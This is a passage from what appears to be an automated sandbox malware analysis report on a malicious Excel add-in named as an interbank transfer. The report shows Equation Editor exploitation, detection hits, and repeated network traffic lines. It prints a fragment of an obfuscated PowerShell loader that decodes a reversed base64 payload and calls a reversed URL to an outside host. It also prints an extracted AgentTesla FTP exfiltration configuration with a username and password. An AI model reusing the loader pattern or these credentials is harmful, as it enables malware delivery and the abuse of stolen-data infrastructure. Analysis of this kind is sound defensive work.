})[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3884, TargetFilename: C:\Users\user\AppData\Local\Temp\u3hmr3af.da3.ps1
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:59:27.937146+020020204241Exploit Kit Activity Detected107.172.31.1380192.168.2.2249168TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:59:16.752082+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249167TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: transferencia interbancaria_66579.xlam.xlsxAvira: detected
                  Source: 9.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
                  Source: transferencia interbancaria_66579.xlam.xlsxReversingLabs: Detection: 63%

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.172.31.13 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035603F0 LoadLibraryW,2_2_035603F0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047F URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0356047F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604AD ShellExecuteW,ExitProcess,2_2_035604AD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604D2 ExitProcess,2_2_035604D2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560498 ShellExecuteW,ExitProcess,2_2_03560498
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560329 ExitProcess,2_2_03560329
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: drive.google.com
                  Source: global trafficDNS query: name: drive.usercontent.google.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
